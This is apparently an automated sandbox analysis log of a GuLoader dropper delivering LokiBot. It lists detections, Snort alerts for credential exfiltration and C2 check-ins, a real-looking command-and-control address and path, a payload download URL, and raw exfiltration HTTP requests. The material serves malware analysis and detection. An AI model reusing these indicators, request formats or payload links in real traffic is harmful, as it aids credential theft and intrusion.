{"Payload URL": "https://drive.google.com/uc?export=download&id=1CVReMZqOnEVXpF"}
Source: 00000006.00000002.411449067.00000000080A0000.00000040.00000001.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1CVReMZqOnEVXpF"} |
Source: lzJWJgZhPc.exe | ReversingLabs: Detection: 39% |
Source: http://63.250.34.171/tickets.php?id=277 | Avira URL Cloud: Label: malware |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Joe Sandbox ML: detected |
Source: lzJWJgZhPc.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: unknown | HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49758 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 142.250.180.161:443 -> 192.168.2.3:49760 version: TLS 1.2 |
Source: lzJWJgZhPc.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT |
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_00406873 FindFirstFileW,FindClose, |
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, |
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_0040290B FindFirstFileW, |
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49761 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49761 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49761 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49761 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49762 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49762 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49762 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49762 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49773 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49773 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49773 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49773 -> 63.250.34.171:80 |
Source: Malware configuration extractor | URLs: https://drive.google.com/uc?export=download&id=1CVReMZqOnEVXpF |
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS |
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: Joe Sandbox View | IP Address: 63.250.34.171 63.250.34.171 |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvmn5idfnisv3ndpp2nat5to25uprreq/1638425325000/03026244708369606156/*/1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-50-docs.googleusercontent.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA495C78Content-Length: 190Connection: close |
Source: global traffic | HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA495C78Content-Length: 190Connection: close |
Source: global traffic | HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA495C78Content-Length: 163Connection: close |
Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760 |
Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758 |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 02 Dec 2021 06:09:39 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html> |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 02 Dec 2021 06:09:43 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html> |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 02 Dec 2021 06:09:46 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html> |
Source: unknown | TCP traffic detected without corresponding DNS query: 63.250.34.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 63.250.34.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 63.250.34.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 63.250.34.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 63.250.34.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 63.250.34.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 63.250.34.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 63.250.34.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 63.250.34.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 63.250.34.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 63.250.34.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 63.250.34.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 63.250.34.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 63.250.34.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 63.250.34.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 63.250.34.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 63.250.34.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 63.250.34.171 |
Source: Form_Sporogeni.exe, 0000000C.00000002.524923598.000000001E706000.00000004.00000001.sdmp | String found in binary or memory: http://63.250.34.171/tickets.php?id=277 |
Source: Form_Sporogeni.exe, 0000000C.00000002.524944806.000000001E719000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: lzJWJgZhPc.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError |
Source: Form_Sporogeni.exe, 0000000C.00000003.497554994.000000000097A000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.524994253.000000001E756000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000003.498697620.0000000000979000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.524944806.000000001E719000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000003.498525929.0000000000977000.00000004.00000001.sdmp | String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/ |
Source: Form_Sporogeni.exe, 0000000C.00000002.524944806.000000001E719000.00000004.00000001.sdmp | String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvmn5idf |
Source: unknown | HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA495C78Content-Length: 190Connection: close |
Source: unknown | DNS traffic detected: queries for: drive.google.com |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvmn5idfnisv3ndpp2nat5to25uprreq/1638425325000/03026244708369606156/*/1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-50-docs.googleusercontent.comConnection: Keep-Alive |
Source: unknown | HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49758 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 142.250.180.161:443 -> 192.168.2.3:49760 version: TLS 1.2 |
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, |
Source: lzJWJgZhPc.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, |
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_0040755C |
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_00406D85 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A78B1 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080AF4FC |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A1B06 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A9950 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A0D7B |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A3A1A |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A1A1E |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A743B |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A9E50 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A1E7F |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080AB8C3 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A32FB |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A3318 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A0524 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A1B30 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A0166 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A0564 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A0393 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A05AA |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A1BC9 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A17CF |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080AB5C0 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A55E9 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A19EC |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A78B1 NtWriteVirtualMemory,LoadLibraryA, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A9950 NtAllocateVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_00570204 LdrInitializeThunk,NtProtectVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_005703C8 Sleep,NtProtectVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_00570212 LdrInitializeThunk,NtProtectVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_005702DD NtProtectVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_005702C4 NtProtectVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_005701CD LdrInitializeThunk,NtProtectVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_005701CB LdrInitializeThunk,NtProtectVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_00570479 NtProtectVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_00570423 NtProtectVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_005703ED NtProtectVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Process Stats: CPU usage > 98% |
Source: lzJWJgZhPc.exe, 00000001.00000002.299514998.0000000000428000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameForm_Sporogeni.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDI |